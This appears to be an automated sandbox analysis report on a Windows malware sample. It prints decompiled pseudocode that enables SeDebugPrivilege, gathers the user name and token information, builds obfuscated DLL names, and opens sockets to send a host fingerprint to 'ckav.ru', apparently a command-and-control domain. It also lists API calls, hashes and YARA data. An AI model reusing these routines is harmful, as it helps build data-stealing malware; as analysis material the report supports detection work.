                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                    				void* _v8;
                    				struct _LUID _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				struct _TOKEN_PRIVILEGES _v32;
                    				intOrPtr* _t13;
                    				void* _t14;
                    				int _t16;
                    				int _t31;
                    				void* _t32;
                    
                    				_t31 = 0;
                    				E004060AC();
                    				_t32 = __eax;
                    				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    				_t14 =  *_t13(_t32, 0x28,  &_v8);
                    				if(_t14 != 0) {
                    					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                    					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                    					if(_t16 != 0) {
                    						_push(__ebx);
                    						_v32.Privileges = _v16.LowPart;
                    						_v32.PrivilegeCount = 1;
                    						_v24 = _v16.HighPart;
                    						_v20 = 2;
                    						E004031E5(1, 9, 0xc1642df2, 0, 0);
                    						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                    						_t31 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_v8);
                    					return _t31;
                    				}
                    				return _t14;
                    			}
                    Instruction addresses: 0x00406512, 0x00406514, 0x00406522, 0x00406524, 0x00406530, 0x00406534, 0x0040653f, 0x0040654e, 0x00406552, 0x0040655a, 0x0040655f, 0x0040656d, 0x00406570, 0x00406573, 0x0040657a, 0x00406589, 0x0040658d, 0x00406590, 0x00406594, 0x00000000, 0x0040659a, 0x004065a1

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID: SeDebugPrivilege
                    • API String ID: 3615134276-2896544425
                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406069(WCHAR* _a4, DWORD* _a8) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                    				_t4 = GetUserNameW(_a4, _a8); // executed
                    				return _t4;
                    			}
                    Instruction addresses: 0x00406077, 0x00406082, 0x00406085

                    APIs
                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                    Memory Dump Source
                    • Source File: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000002.544901710.00000000004A0000.00000040.00000001.sdmp
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                    				int _v8;
                    				long _v12;
                    				int _v16;
                    				int _v20;
                    				char _v24;
                    				char _v28;
                    				char _v32;
                    				intOrPtr* _t25;
                    				int _t27;
                    				int _t30;
                    				int _t31;
                    				int _t36;
                    				int _t37;
                    				intOrPtr* _t39;
                    				int _t40;
                    				void* _t41;
                    				long _t44;
                    				intOrPtr* _t45;
                    				int _t46;
                    				void* _t48;
                    				int _t49;
                    				void* _t67;
                    				void* _t68;
                    				void* _t74;
                    
                    				_t48 = __ebx;
                    				_t67 = 0;
                    				_v8 = 0;
                    				E00402BF2();
                    				_t68 = __eax;
                    				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                    				_t2 =  &_v8; // 0x414449
                    				_push(1);
                    				_push(8);
                    				_push(_t68);
                    				if( *_t25() != 0) {
                    					L4:
                    					_t27 = E00402B7C(0x208);
                    					_v20 = _t27;
                    					__eflags = _t27;
                    					if(_t27 != 0) {
                    						E0040338C(_t27, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_push(_t48);
                    					_t49 = E00402B7C(0x208);
                    					__eflags = _t49;
                    					if(_t49 != 0) {
                    						E0040338C(_t49, _t67, 0x104);
                    						_t74 = _t74 + 0xc;
                    					}
                    					_v28 = 0x208;
                    					_v24 = 0x208;
                    					_t7 =  &_v8; // 0x414449
                    					_v12 = _t67;
                    					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                    					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                    					__eflags = _t30;
                    					if(_t30 == 0) {
                    						_t36 = E00402B7C(_v12);
                    						_v16 = _t36;
                    						__eflags = _t36;
                    						if(_t36 != 0) {
                    							_t14 =  &_v8; // 0x414449, executed
                    							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                    							__eflags = _t37;
                    							if(_t37 != 0) {
                    								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                    								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                    								__eflags = _t40;
                    								if(__eflags != 0) {
                    									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
                    									_t67 = _t41;
                    								}
                    							}
                    							E00402BAB(_v16);
                    						}
                    					}
                    					__eflags = _v8;
                    					if(_v8 != 0) {
                    						E00403C40(_v8); // executed
                    					}
                    					__eflags = _t49;
                    					if(_t49 != 0) {
                    						E00402BAB(_t49);
                    					}
                    					_t31 = _v20;
                    					__eflags = _t31;
                    					if(_t31 != 0) {
                    						E00402BAB(_t31);
                    					}
                    					return _t67;
                    				}
                    				_t44 = GetLastError();
                    				if(_t44 == 0x3f0) {
                    					E004060AC();
                    					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                    					_t3 =  &_v8; // 0x414449
                    					_t46 =  *_t45(_t44, 8, _t3);
                    					__eflags = _t46;
                    					if(_t46 == 0) {
                    						goto L2;
                    					}
                    					goto L4;
                    				}
                    				L2:
                    				return 0;
                    			}

                    APIs
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                    • _wmemset.LIBCMT ref: 00406244
                    • _wmemset.LIBCMT ref: 00406261
                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _wmemset$ErrorInformationLastToken
                    • String ID: IDA$IDA
                    • API String ID: 487585393-2020647798
                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				intOrPtr _v28;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				void _v40;
                    				void* _t23;
                    				signed int _t24;
                    				signed int* _t25;
                    				signed int _t30;
                    				signed int _t31;
                    				signed int _t33;
                    				signed int _t41;
                    				void* _t42;
                    				signed int* _t43;
                    
                    				_v8 = _v8 & 0x00000000;
                    				_t33 = 8;
                    				memset( &_v40, 0, _t33 << 2);
                    				_v32 = 1;
                    				_t23 =  &_v40;
                    				_v28 = 6;
                    				_v36 = 2;
                    				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                    				if(_t23 == 0) {
                    					_t24 = E00402B7C(4);
                    					_t43 = _t24;
                    					_t31 = _t30 | 0xffffffff;
                    					 *_t43 = _t31;
                    					_t41 = _v8;
                    					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                    					 *_t43 = _t24;
                    					if(_t24 != _t31) {
                    						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                    						if(_t24 == _t31) {
                    							E00404DE5(_t24,  *_t43);
                    							 *_t43 = _t31;
                    						}
                    						__imp__freeaddrinfo(_v8);
                    						if( *_t43 != _t31) {
                    							_t25 = _t43;
                    							goto L10;
                    						} else {
                    							E00402BAB(_t43);
                    							L8:
                    							_t25 = 0;
                    							L10:
                    							return _t25;
                    						}
                    					}
                    					E00402BAB(_t43);
                    					__imp__freeaddrinfo(_v8);
                    					goto L8;
                    				}
                    				return 0;
                    			}

                    APIs
                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                    • socket.WS2_32(?,?,?,00000000,00000000), ref: 00404E7A
                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: freeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 2479546573-0
                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                    				struct _SECURITY_ATTRIBUTES* _v8;
                    				char _v12;
                    				long _v16;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t16;
                    				intOrPtr* _t25;
                    				long* _t28;
                    				void* _t30;
                    				int _t32;
                    				intOrPtr* _t33;
                    				void* _t35;
                    				void* _t42;
                    				intOrPtr _t43;
                    				long _t44;
                    				struct _OVERLAPPED* _t46;
                    
                    				_t46 = 0;
                    				_t35 = 0;
                    				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                    				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                    				_t42 = _t16;
                    				_v8 = _t42;
                    				if(_t42 == 0xffffffff) {
                    					__eflags = _a12;
                    					if(_a12 == 0) {
                    						L10:
                    						return _t35;
                    					}
                    					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                    					__eflags = _t43;
                    					if(_t43 == 0) {
                    						goto L10;
                    					}
                    					_push(0);
                    					__eflags = E00403C59(_a4, _t43);
                    					if(__eflags != 0) {
                    						_v8 = 0;
                    						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                    						_push(_t43);
                    						 *_a8 = _v8;
                    						E00403D44();
                    					}
                    					E00402BAB(_t43);
                    					return _t46;
                    				}
                    				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                    				_t44 =  *_t25(_t42,  &_v12);
                    				if(_v12 != 0 || _t44 > 0x40000000) {
                    					L8:
                    					_t45 = _v8;
                    					goto L9;
                    				} else {
                    					_t28 = _a8;
                    					if(_t28 != 0) {
                    						 *_t28 = _t44;
                    					}
                    					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                    					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                    					_t35 = _t30;
                    					if(_t35 == 0) {
                    						goto L8;
                    					} else {
                    						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                    						_t45 = _v8;
                    						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                    						if(_t32 == 0) {
                    							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                    							 *_t33(_t35, _t46, 0x8000);
                    							_t35 = _t46;
                    						}
                    						L9:
                    						E00403C40(_t45); // executed
                    						goto L10;
                    					}
                    				}
                    			}

                    APIs
                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: File$AllocCreateReadVirtual
                    • String ID: .tmp
                    • API String ID: 3585551309-2986845003
                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E00413866(void* __eflags) {
                    				short _v6;
                    				short _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v20;
                    				short _v22;
                    				char _v24;
                    				short _v28;
                    				short _v30;
                    				short _v32;
                    				short _v34;
                    				short _v36;
                    				short _v38;
                    				short _v40;
                    				short _v42;
                    				short _v44;
                    				short _v46;
                    				char _v48;
                    				short _v52;
                    				short _v54;
                    				short _v56;
                    				short _v58;
                    				short _v60;
                    				short _v62;
                    				short _v64;
                    				short _v66;
                    				short _v68;
                    				short _v70;
                    				short _v72;
                    				short _v74;
                    				char _v76;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t38;
                    				short _t43;
                    				short _t44;
                    				short _t45;
                    				short _t46;
                    				short _t47;
                    				short _t48;
                    				short _t50;
                    				short _t51;
                    				short _t52;
                    				short _t54;
                    				short _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t59;
                    				intOrPtr* _t61;
                    				void* _t63;
                    				WCHAR* _t65;
                    				long _t68;
                    				void* _t75;
                    				short _t76;
                    				short _t78;
                    				short _t83;
                    				short _t84;
                    				short _t85;
                    
                    				E00402C6C(_t38);
                    				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                    				SetErrorMode(3); // executed
                    				_t43 = 0x4f;
                    				_v76 = _t43;
                    				_t44 = 0x4c;
                    				_v74 = _t44;
                    				_t45 = 0x45;
                    				_v72 = _t45;
                    				_t46 = 0x41;
                    				_v70 = _t46;
                    				_t47 = 0x55;
                    				_v68 = _t47;
                    				_t48 = 0x54;
                    				_t76 = 0x33;
                    				_t84 = 0x32;
                    				_t83 = 0x2e;
                    				_t78 = 0x64;
                    				_t85 = 0x6c;
                    				_v66 = _t48;
                    				_v52 = 0;
                    				_t50 = 0x77;
                    				_v48 = _t50;
                    				_t51 = 0x73;
                    				_v46 = _t51;
                    				_t52 = 0x5f;
                    				_v42 = _t52;
                    				_v28 = 0;
                    				_t54 = 0x6f;
                    				_v24 = _t54;
                    				_t55 = 0x65;
                    				_v20 = _t55;
                    				_v64 = _t76;
                    				_v62 = _t84;
                    				_v60 = _t83;
                    				_v58 = _t78;
                    				_v56 = _t85;
                    				_v54 = _t85;
                    				_v44 = _t84;
                    				_v40 = _t76;
                    				_v38 = _t84;
                    				_v36 = _t83;
                    				_v34 = _t78;
                    				_v32 = _t85;
                    				_v30 = _t85;
                    				_v22 = _t85;
                    				_v18 = _t76;
                    				_v16 = _t84;
                    				_v14 = _t83;
                    				_v12 = _t78;
                    				_v10 = _t85;
                    				_v8 = _t85;
                    				_v6 = 0;
                    				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t57( &_v76);
                    				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t59( &_v48);
                    				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				_t81 =  &_v24;
                    				 *_t61( &_v24); // executed
                    				_t63 = E00414059(); // executed
                    				if(_t63 != 0) {
                    					_t65 = E00413D97(0);
                    					E004031E5(0, 0, 0xcf167df4, 0, 0);
                    					CreateMutexW(0, 1, _t65); // executed
                    					_t68 = GetLastError();
                    					_t92 = _t68 - 0xb7;
                    					if(_t68 == 0xb7) {
                    						E00413B81(0);
                    						_pop(_t81); // executed
                    					}
                    					E00413003(_t92); // executed
                    					E00412B2E(_t92); // executed
                    					E00412D31(_t81, _t84); // executed
                    					E00413B3F();
                    					E00413B81(0);
                    					 *0x49fdd0 = 1;
                    				}
                    				return 0;
                    			}

                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                    				long _v8;
                    				void* _t7;
                    				long _t10;
                    				void* _t21;
                    				struct _OVERLAPPED* _t24;
                    
                    				_t14 = __ebx;
                    				_t24 = 0;
                    				_v8 = 0;
                    				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                    				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                    				_t21 = _t7;
                    				if(_t21 != 0xffffffff) {
                    					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                    					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                    					if(_t10 != 0xffffffff) {
                    						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                    						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                    						_t24 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_t21); // executed
                    				}
                    				return _t24;
                    			}

                    Instruction addresses: 0x004042cf to 0x0040434c

                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E00412D31(void* __ecx, void* __edi) {
                    				long _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				char _v40;
                    				void* __ebx;
                    				intOrPtr* _t10;
                    				void* _t11;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    				void* _t35;
                    				void* _t53;
                    				char* _t57;
                    				void* _t58;
                    				void* _t61;
                    				void* _t64;
                    				void* _t65;
                    				intOrPtr* _t66;
                    				void* _t67;
                    				void* _t68;
                    				void* _t69;
                    				void* _t70;
                    				void* _t71;
                    				void* _t72;
                    				void* _t73;
                    
                    				_t53 = __ecx;
                    				_t10 =  *0x49fde0;
                    				_t68 = _t67 - 0x24;
                    				 *0x49fddc = 0x927c0;
                    				 *0x49fde4 = 0;
                    				_t75 = _t10;
                    				if(_t10 != 0) {
                    					L16:
                    					_push(1);
                    					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                    					_t61 = _t11;
                    					_t68 = _t68 + 0xc;
                    					if(_t61 != 0) {
                    						E004031E5(0, 0, 0xfcae4162, 0, 0);
                    						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                    					}
                    					L004067C4(0xea60); // executed
                    					_pop(_t53);
                    				} else {
                    					_push(__edi);
                    					 *0x49fde0 = E004056BF(0x2bc);
                    					E00413DB7(_t53, _t75,  &_v40);
                    					_t57 =  &_v24;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					E004058D4( *0x49fde0, 0x12);
                    					E004058D4( *0x49fde0, 0x28);
                    					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                    					_t69 = _t68 + 0x28;
                    					_t64 = E0040632F();
                    					_push(0);
                    					_push(1);
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t70 = _t69 + 0x10;
                    					} else {
                    						_push(_t64);
                    						_push( *0x49fde0);
                    						E00405872();
                    						E00402BAB(_t64);
                    						_t70 = _t69 + 0x14;
                    					}
                    					_t58 = E00406130(_t57);
                    					_push(0);
                    					_push(1);
                    					_t77 = _t64;
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t25 = E00405872();
                    						_t71 = _t70 + 0x10; // executed
                    					} else {
                    						_push(_t58);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t25 = E00402BAB(_t58);
                    						_t71 = _t70 + 0x14;
                    					}
                    					_t26 = E004061C3(_t25, 0, _t77); // executed
                    					_t65 = _t26;
                    					_push(0);
                    					_push(1);
                    					if(_t65 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t27 = E00405872();
                    						_t72 = _t71 + 0x10;
                    					} else {
                    						_push(_t65);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t27 = E00402BAB(_t65);
                    						_t72 = _t71 + 0x14;
                    					}
                    					_t66 = E00406189(_t27);
                    					_t79 = _t66;
                    					if(_t66 == 0) {
                    						E00405781( *0x49fde0, 0);
                    						E00405781( *0x49fde0, 0);
                    						_t73 = _t72 + 0x10;
                    					} else {
                    						E00405781( *0x49fde0,  *_t66);
                    						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                    						E00402BAB(_t66);
                    						_t73 = _t72 + 0x14;
                    					}
                    					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                    					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                    					_t35 = E0040642C(_t79); // executed
                    					E004058D4( *0x49fde0, _t35);
                    					E004058D4( *0x49fde0, _v24);
                    					E004058D4( *0x49fde0, _v20);
                    					E004058D4( *0x49fde0, _v16);
                    					E004058D4( *0x49fde0, _v12);
                    					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                    					_t68 = _t73 + 0x48;
                    				}
                    				_t80 =  *0x49fde4;
                    				if( *0x49fde4 == 0) {
                    					_t10 =  *0x49fde0;
                    					goto L16;
                    				}
                    				return E00405695(_t53,  *0x49fde0);
                    			}

                    Instruction addresses: 0x00412d31 to 0x00412f74

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Memory Dump Source
                    • Source File: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000002.00000001.292567867.00000000004A0000.00000040.00020000.sdmp
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040632F() {
                    				char _v8;
                    				void* _t4;
                    				void* _t7;
                    				void* _t16;
                    
                    				_t16 = E00402B7C(0x208);
                    				if(_t16 == 0) {
                    					L4:
                    					_t4 = 0;
                    				} else {
                    					E0040338C(_t16, 0, 0x104);
                    					_t1 =  &_v8; // 0x4143e8
                    					_v8 = 0x208;
                    					_t7 = E00406069(_t16, _t1); // executed
                    					if(_t7 == 0) {
                    						E00402BAB(_t16);
                    						goto L4;
                    					} else {
                    						_t4 = _t16;
                    					}
                    				}
                    				return _t4;
                    			}

                    Instruction addresses: 0x00406340 to 0x0040637a

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
